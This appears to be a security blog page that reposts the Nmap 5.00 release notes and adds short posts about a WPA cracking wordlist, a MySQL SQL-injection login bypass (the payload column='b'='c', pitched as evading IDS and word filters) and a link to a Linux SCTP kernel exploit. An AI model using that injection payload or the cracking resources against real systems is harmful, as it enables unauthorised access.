Nmap Scripting Engine (NSE)

The Nmap Scripting Engine (NSE) is one of Nmap’s most powerful and flexible features. It allows users to write (and share) simple scripts to automate a wide variety of networking tasks. Those scripts are then executed in parallel with the speed and efficiency you expect from Nmap. It existed in Nmap 4.50, but has been dramatically improved:

  • Every script has been improved, and the number of scripts has grown nearly 50% to 59.
  • Ron Bowes embarked on a massive MSRPC/NETBIOS project to allow Nmap to interrogate Windows machines much more completely. He added six NSE libraries (msrpc, msrpcperformance, msrpctypes, netbios, smb, and smbauth) and 14 scripts (p2p-conficker, smb-brute, smb-check-vulns, smb-enum-domains, smb-enum-processes, smb-enum-sessions, smb-enum-shares, smb-enum-users, smb-os-discovery, smb-pwdump, smb-security-mode, smb-server-stats, and smb-system-info). He also wrote a detailed paper on the new scripts.
  • Nmap was one of the first scanners to remotely detect the Conficker worm thanks to smb-check-vulns, and p2p-conficker.
  • Other new scripts include:
    asn-query—Maps IP addresses to autonomous system (AS) numbers.
    auth-spoof—Checks for an identd (auth) server which is spoofing its replies.
    banner—A simple banner grabber which connects to an open TCP port and prints out anything sent by the listening service within five seconds.
    dns-random-srcport—Checks a DNS server for the predictable-port recursion vulnerability. Predictable source ports can make a DNS server vulnerable to cache poisoning attacks (see CVE-2008-1447).
    dns-random-txid—Checks a DNS server for the predictable-TXID DNS recursion vulnerability. Predictable TXID values can make a DNS server vulnerable to cache poisoning attacks (see CVE-2008-1447).
    ftp-bounce—Checks to see if an FTP server allows port scanning using the FTP bounce method.
    http-iis-webdav-vuln—Checks for a vulnerability in IIS 5.1/6.0 that allows arbitrary users to access secured WebDAV folders by searching for a password-protected folder and attempting to access it. This vulnerability was patched in Microsoft Security Bulletin MS09-020.
    http-passwd—Checks if a web server is vulnerable to directory traversal by attempting to retrieve /etc/passwd using various traversal methods such as requesting ../../../../etc/passwd.
    imap-capabilities—Retrieves IMAP email server capabilities.
    mysql-info—Connects to a MySQL server and prints information such as the protocol and version numbers, thread ID, status, capabilities, and the password salt.
    pop3-brute—Tries to log into a POP3 account by guessing usernames and passwords.
    pop3-capabilities—Retrieves POP3 email server capabilities.
    rpcinfo—Connects to portmapper and fetches a list of all registered programs.
    snmp-brute—Attempts to find an SNMP community string by brute force guessing.
    socks-open-proxy—Checks if an open socks proxy is running on the target.
    upnp-info—Attempts to extract system information from the UPnP service.
    whois—Queries the WHOIS services of Regional Internet Registries (RIR) and attempts to retrieve information about the IP Address Assignment which contains the Target IP Address.
  • The set of new libraries is equally impressive. Modules are all listed here (scroll down to “Modules”).
  • Introduced the NSE Documentation Portal which documents every NSE script and library included with Nmap. It is generated from NSEDoc comments embedded in scripts. Scripts are available for download on this site as well. We also dramatically improved the NSE Guide.
  • NSE now supports run-time interaction so you know when it will complete, and the –host-timeout option so you can define when it completes. Support for -S (source IP address) and –ip-options has been added to the NSE and version detection subsystems.
  • Added Boolean Operators for –script. You may now use (“and”, “or”, or “not”) combined with categories, filenames, and wildcarded filenames to match a set of files. A new default category includes the scripts which run by default when NSE is requested.
  • NSE can now be used in combination with ping scan (e.g. “-sP –script”) so that you can execute host scripts without needing to perform a port scan.

Zenmap graphical front-end and results viewer

Zenmap is a cross-platform (Linux, Windows, Mac OS X, etc.) Nmap GUI and results viewer which supports all Nmap options. It aims to make Nmap easy for beginners to use while providing advanced features for experienced Nmap users. Frequently used scans can be saved as profiles to make them easy to run repeatedly. A command creator allows interactive creation of Nmap command lines. Scan results can be saved and viewed later. Saved scan results can be compared with one another to see how they differ. The results of recent scans are stored in a searchable database. While Zenmap already existed in Nmap 4.50, it has improved dramatically since then:

  • While Nmap stands for “Network Mapper”, it hasn’t been able to actually draw you a map of the network—until now! The new Zenmap Network Topology feature provides an interactive, animated visualization of the hosts on a network and connections between them. The scan source is (initially) in the center, with other hosts on a series of concentric circles which represent the number of hops away they are from the source. Nodes are connected by lines representing discovered paths between them. Read the full details (and oogle the pretty pictures) in our article on Surfing the Network Topology. Topology views can be saved as a PNG, postscript, PDF, or SVG image.
  • The scan aggregation feature allows you to combine the results of many Nmap scans into one view. When one scan is finished, you may start another in the same window. Results of the new scan are seamlessly merged into one view.
  • Zenmap has been internationalized and translated by volunteers into four languages (French, German, Brazilian Portuguese, and Croatian). We have instructions on using an existing translation and we’re always looking for volunteers to translate Zenmap into your native language.
  • Overhauled the default list of scan profiles to provide a much more diverse and useful set of default profile options. If users don’t like any of these canned scan commands, they can easily create their own in the Profile Editor.
  • Added a context-sensitive help system to the Profile Editor. Mouse-over options to learn more about what they do and their argument syntax.
  • Added advanced search functionality to Zenmap so that you can locate previous scans using criteria such as which ports were open, keywords in the target names, OS detection results, etc. Try it out with Ctrl-F or “Tools->Search Scan Results”.
  • The “Compare Results” feature now uses our new Ndiff scan comparison tool.
  • And more: An animated throbber has been added to indicate that a scan is running, and a new cancel button lets you stop a scan in its track. The Nmap output window now scrolls automatically, and ports are colored based on open/closed state.
  • David wrote an exceptional users’ guide, which also became a chapter of Nmap Network Scanning.

Ncat data transfer, redirection, and debugging tool

.       .
`-"'"-'/
} 6 6 {
==. Y ,==
/^^^  .
/       )
(  )-(  )/     _
-""---""---   /
/   Ncat    _/
(     ____
_.=|____E

Nmap 5 introduces Ncat, a general-purpose command-line tool for reading, writing, redirecting, and encrypting data across a network. It aims to be your network Swiss Army knife, handling a wide variety of security testing and administration tasks. Ncat is suitable for interactive use or as a network-connected back end for other tools. Ncat can:

  • Act as a simple TCP/UDP/SSL client for interacting with web servers, telnet servers, mail servers, and other TCP/IP network services. Often the best way to understand a service (for fixing problems, finding security flaws, or testing custom commands) is to interact with it using Ncat. This lets you you control every character sent and view the raw, unfiltered responses.
  • Act as a simple TCP/UDP/SSL server for offering services to clients, or simply to understand what existing clients are up to by capturing every byte they send.
  • Redirect or proxy TCP/UDP traffic to other ports or hosts. This can be done using simple redirection (everything sent to a port is automatically relayed somewhere else you specify in advance) or by acting as a SOCKS or HTTP proxy so clients specify their own destinations. In client mode, Ncat can connect to destinations through a chain of anonymous or authenticated proxies.
  • Run on all major operating systems. We distribute Linux, Windows, and Mac OS X binaries, and Ncat compiles on most other systems. A trusted tool must be available whenever you need it, no matter what computer you’re using.
  • Encrypt communication with SSL, and transport it over IPv4 or IPv6.
  • Act as a network gateway for execution of system commands, with I/O redirected to the network. It was designed to work like the Unix utility cat, but for the network.
  • Act as a connection broker, allowing two (or far more) clients to connect to each other through a third (brokering) server. This enables multiple machines hidden behind NAT gateways to communicate with each other, and also enables the simple Ncat chat mode.

These capabilities become even more powerful and versatile when combined.

Ncat is our modern reinvention of the venerable Netcat (nc) tool released by Hobbit in 1996. While Ncat is similar to Netcat in spirit, they don’t share any source code. Instead, Ncat makes use of Nmap’s well optimized and tested networking libraries. Compatibility with the original Netcat and some well known variants is maintained where it doesn’t conflict with Ncat’s enhancements or cause usability problems. Ncat adds many capabilities not found in Hobbit’s original nc, including SSL support, proxy connections, IPv6, and connection brokering. The original nc contained a simple port scanner, but we omitted that from Ncat because we have a preferred tool for that function.

Ncat is extensively documented in its Users’ Guide, man page, and home page.

Host discovery and port scanning performance and features

Nmap has been doing host discovery and port scanning since its release in ’97, but we continue to improve this core functionality. We’ve added many new features and dramatically improved performance! Here are the biggest enhancements since 4.50:

  • Nmap now scans the most common 1,000 ports by default in either protocol (UDP scan is still optional). These were determined by spending months scanning tens of millions of IPs on the Internet. This makes Nmap faster (used to scan 1,715 TCP ports by default) and yet more comprehensive since the smaller number of ports are better chosen.
  • Nmap fast scan (-F) now scans the top 100 ports by default in either protocol. This is a decrease from 1,276 (TCP) and 1,017 (UDP) in Nmap 4.68. Port scanning time with -F is generally an order of magnitude faster than before, making -F worthy of its “fast scan” moniker.
  • The –top-ports option lets you specify the number of ports you wish to scan in each protocol, and will pick the most popular ports for you based on the new frequency data. For both TCP and UDP, the top 10 ports gets you roughly half of the open ports. The top 1,000 (out of 65,536 possible) finds roughly 93% of the open TCP ports and more than 95% of the open UDP ports.
  • Added a new –min-rate option that allows specifying a minimum rate at which to send packets. This allows you to override Nmap’s congestion control algorithms and request that Nmap try to keep at least the rate you specify. A complementary –max-rate option was added as well. They are documented here.
  • Added SCTP port scanning support to Nmap. Stream control transmission protocol is a layer 4 protocol used mostly for telephony related applications. This brings the following new features:
    • SCTP INIT chunk port scan (-sY): open ports return an INIT-ACK chunk, closed ones an ABORT chunk. This is the SCTP equivalent of a TCP SYN stealth scan.
    • SCTP COOKIE-ECHO chunk port scan (-sZ): open ports are silent, closed ports return an ABORT chunk.
    • SCTP-specific IP protocol scan (-sO -p sctp).
    • SCTP-specific traceroute support (–traceroute).
    • The server scanme.csnc.ch has been set up for your SCTP scan testing pleasure. But note that SCTP doesn’t pass through most NAT devices.
  • David spent more than a month on algorithms to improve port scan performance while retaining or improving accuracy. The changes, described here, reduce our “benchmark scan time” (which involves many different scan types from many source networks to many targets) from 1879 seconds to 1321 without harming accuracy. That is a 30% time reduction! Fyodor made a number of performance improvements as well.
  • The host discovery (ping probe) defaults have been enhanced to include twice as many probes. The default is now “-PE -PS443 -PA80 -PP”. In exhaustive testing of 90 different probes, this emerged as the best four-probe combination, finding 14% more Internet hosts than the previous default, “-PE -PA80″. The default for non-root users is -PS80,443, replacing the previous default of -PS80. In addition, ping probes are now sent in order of effectiveness (-PE first) so that less effective probes may not have to be sent. ARP ping is still the default on local ethernet networks.
  • Fixed an integer overflow which prevented a target specification of “*.*.*.*” from working. Support for the CIDR /0 is now also available for those times you wish to scan the entire Internet.
  • When Nmap finds a probe during ping scan which elicits a response, it now saves that information for the port scan and later phases. It can then “ping” the host with that probe as necessary to collect timing information even if the host is not responding to the normal port scan packets. Previously, Nmap’s port scan timing pings could only use information gathered during that port scan itself. A number of other “port scan ping” system improvements were made at the same time to improve performance against firewalled hosts (full details).

Fyodor’s Nmap book

Fyodor released Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning. From explaining port scanning basics for novices to detailing low-level packet crafting methods used by advanced hackers, this book suits all levels of security and networking professionals. A 42-page reference guide documents every Nmap feature and option, while the rest of the book demonstrates how to apply those features to quickly solve real-world tasks. It was briefly the #1 selling computer book on Amazon. More than half of the book is already free online.

A German translation is available from Open Source Press; Korean and Brazilian Portuguese translations are forthcoming.

Operating system detection

Thanks to fingerprint submissions from thousands of Nmap users around the world, the 2nd generation OS detection database has nearly doubled in size since 4.50 to 2,003 entries. These include the latest versions of Windows, Linux, and Mac OS X as well as more specialized entries such as oscilloscopes, ATM machines, employee timeclocks, DVRs, game consoles, and much more. Keep those submissions coming!

In addition to doubling the database size, we enhanced the OS detection engine and its tests to improve accuracy. For example, we added a new SEQ.CI test (IP ID sequence generation from closed TCP port) and removed the U1.RUL, U1.TOS, IE.DLI, IE.SI, and IE.TOSI tests.

Version detection

Nmap’s version detection system interrogates open ports to determine what service (e.g. http, smtp) is running and often the exact application name and version number. The version detection database grew by nearly a thousand signatures. It grew from 4,558 signatures representing 449 protocols in Nmap 4.50 to 5,512 signatures for 511 protocols in 5.00. You can read about Doug’s signature creation adventures here, here, and here. The service protocols with the most signatures are http (1,868), telnet (584), ftp (506), smtp (363), pop3 (209), http-proxy (136), ssh (123), imap (122), and irc (48). Among the protocols with just one signature are netrek, gopher-proxy, ncat-chat, and metasploit.

Ndiff scan comparison tool

The new Ndiff utility compares the results of two Nmap scans and describes the new/removed hosts, newly open/closed ports, changed operating systems, or application versions, etc. This makes it trivial to scan your networks on a regular basis and create a report (XML or text format) on all the changes. See the Ndiff man page and home page for more information. Ndiff is included in our binary packages and built by default, though you can prevent it from being built by specifying the –without-ndiff configure flag.

Here are excerpts from an Ndiff comparison between two scans for the Facebook network:

> ndiff -v facebook-vscan-1237136401.xml facebook-vscan-1237395601.xml
-Nmap 4.85BETA3 at 2009-03-15 10:00
+Nmap 4.85BETA4 at 2009-03-18 10:00

+arborvip.tfbnw.net (69.63.179.23):
+Host is up.
+Not shown: 100 filtered ports

www2.02.07.facebook.com (69.63.180.12):
Host is up.
Not shown: 98 filtered ports
PORT    STATE SERVICE  VERSION
-80/tcp  open  http     Apache httpd 1.3.41.fb2
+80/tcp  open  http     Apache httpd 1.3.41.fb1
443/tcp open  ssl/http Apache httpd 1.3.41.fb2

And here is a trivial cron script demonstrating how easy it is to scan a network daily and mail yourself the changes (and full results in this case):

#!/bin/sh
date=`date "+%s"`
cd /hack/facebook/scripts/
nmap -T4 -F -sV -O --osscan-limit --osscanguess -oA facebook-${date} [netblocks] > /dev/null
ndiff facebook-old.xml facebook-${date}.xml > facebook-diff-${date}
cp facebook-${date}.xml facebook-old.xml
echo "n********** NDIFF RESULTS **********n"
cat facebook-vscan-diff-${date}
echo "n********** SCAN RESULTS **********n"
cat facebook-vscan-${date}.nmap

You could do a similar thing using Windows’ scheduled tasks.

IronGeek has created an Ndiff 5 introductory video demonstrating command-line Ndiff plus its use within Zenmap.

Documentation and web site improvements

While Nmap Network Scanning may be the most exciting documentation news for this release, we did make many other important web site and documentation changes:

  • Added German and Russian translations of the Nmap Reference Guide (Man Page). You can choose from all 16 available languages from the Nmap docs page.
  • Nmap has moved. Everything at http://insecure.org/nmap/ can now be found at http://nmap.org . That should save your fingers from a little bit of typing.
  • A copy of the Nmap public svn repository (/nmap, plus its zenmap, nsock, nbase, and ncat externals) is now available at http://nmap.org/svn/. We update this regularly, but it may be slightly behind the SVN version. It is particularly useful when you need to link to files in the tree, since browsers generally don’t handle svn:// repository links.

Portability enhancements

Nmap’s dramatic improvements are of little value if it doesn’t run on your system. Fortunately, portability has always been a high priority. Nmap 5.00 runs on all major operating systems, plus the Amiga. Portability improvements in this release include:

  • A Mac OS X Nmap/Zenmap installer is now available from the Nmap download page. It is rather straightforward, but detailed instructions are available anyway. As a universal installer, it works on both Intel and PPC Macs. It is distributed as a disk image file (.dmg) containing an mpkg package. The installed Nmap include OpenSSL support and also supports Authorization Services so that Zenmap can run as root when necessary.
  • Nmap’s special WinPcap installer now handles 64-bit Windows machines by installing the proper 64-bit npf.sys.
  • The Nmap installer was updated to handle the Windows 7 release candidate.
  • The Windows version of Nmap (both .zip and executable installer) now supports OpenSSL, as do the Linux RPM binaries we distribute. The UNIX source tarball has supported OpenSSL for years.
  • We now compile in IPv6 support on Windows. In order to use this, you need to have IPv6 set up. It is installed by default on Vista, but must be manually installed for XP.

Even more improvements

  • The compile-time Nmap ASCII dragon is now more ferocious thanks to better teeth alignment:
    (  )   /   _                 (
    |  (   ( .(               )                      _____
    `  `   )              (  ___                 / _
    (_`    +   . x  ( .            /   ____-----------/ (o)   _
    - .-               +  ;          (  O                           ____
    )        _____________  `                /
    (__                +- .( -'.-
  • The new –stats-every option takes a time interval that controls how often timing status updates are printed. It is useful when Nmap is run by another program as a subprocess, or if you just like frequent timing updates.
  • Completion time estimates provided in verbose mode or when you hit a key during scanning are now more accurate.
  • The nmap-dev and nmap-hackers mailing list RSS feeds at SecLists.Org now include message excerpts to make it easier to identify interesting messages and speed the process of reading through the list. Feeds for all other mailing lists archived at SecLists.Org have been similarly augmented (details).
  • Fixed an integer overflow in the scan progress meter. As an Nmap user, few things are more discouraging than seeing your estimated completion time rise so high that it goes negative.
  • Nmap’s output options (-oA, -oX, etc.) now support strftime()-like conversions in the filename. %H, %M, %S, %m, %d, %y, and %Y are all the same as in strftime(). %T is the same as %H%M%S, %R is the same as %H%M, and %D is the same as %m%d%y. So means that “-oX ‘scan-%T-%D.xml’” uses an XML file in the form of “scan-144840-121307.xml”.
  • Removed Brazilian poetry/lyrics from Zenmap source code (NmapOutputViewer.py). We’ve seen enough of it in the debug logs. “E nao se entrega, nao”. We also removed a code comment which declared /*WANKER ALERT!*/ for no good reason.
  • Nmap and Nmap-WinPcap silent installation now works on Windows. Nmap can be silently installed with the /S option to the installer. If you install Nmap from the zip file, you can install just WinPcap silently with the /S option to that installer.
  • –traceroute is now faster and more effective because it uses the timing ping probe saved from host discovery and port scanning. The timing ping probe is always the best probe Nmap knows about for eliciting a response from a target.
  • We now have a public TODO list describing our future plans and tasks which need work.
  • Google sponsored 6 college/grad students for Summer of Code 2009. They and their ongoing projects are introduced here.
  • Nmap now builds with the _FORTIFY_SOURCE=2 define. With modern versions of GCC, this adds extra buffer overflow protection and other security checks.
  • Nmap was discovered in its eighth movie. In the Russian film Khottabych, teenage hacker Gena uses Nmap (and telnet) to hack Microsoft. In response, MS sends a pretty female hacker to flush him out (more details and screen shots).
  • To better support users with attention deficit disorder, we created an Nmap Twitter feed. We still recommend that all users subscribe to the low-traffic nmap-hackers announcement mailing list.
  • Nmap won LinuxQuestions.Org Network Security Application of the Year for the sixth year in a row.
  • These release notes mostly discuss new features, but we also made many performance enhancements and fixed a large number of bugs which could lead to crashes, compilation failures, or other misbehavior.

These are just highlights from the full list of changes you can find in our CHANGELOG.

Share

Offensive-Security WPA Rainbow Tables

The guys over at Offensive Security have released a 49 Million WPA optimised password dictionary file, the torrents are up at this link here.

If you download it though, please keep the torrents seeding for a while to help others out.

Have fun cracking!

Share

Mysql authentication bypass

I saw a demo of Green SQL today, and during the demo Yuli showed me a cute sql-injection method for mysql that I’ve never seen before.

This will evade some IDS’s and is also a good reply for the web development if they tell you filtering the words “OR” and “AND” is enough as a generic SQL-injection protection.
It’s not “new”, but it was new to me. The idea is to place two equal signs inside the query so that the query becomes:

SELECT * FROM users WHERE column=’b’=’c’

More information and a very detailed explanation here. It seems to be specific to mysql.

Share

Linux SCTP All Shook Up

An exploit for the denial-of-service-considered remote SCTP vulnerability in the linux kernel has been released.

http://sgrakkyu.antifork.org/sctp_houdini.c

The exploit contains multiple targets and covers 32/64 bits architectures… play time started this morning =X

Share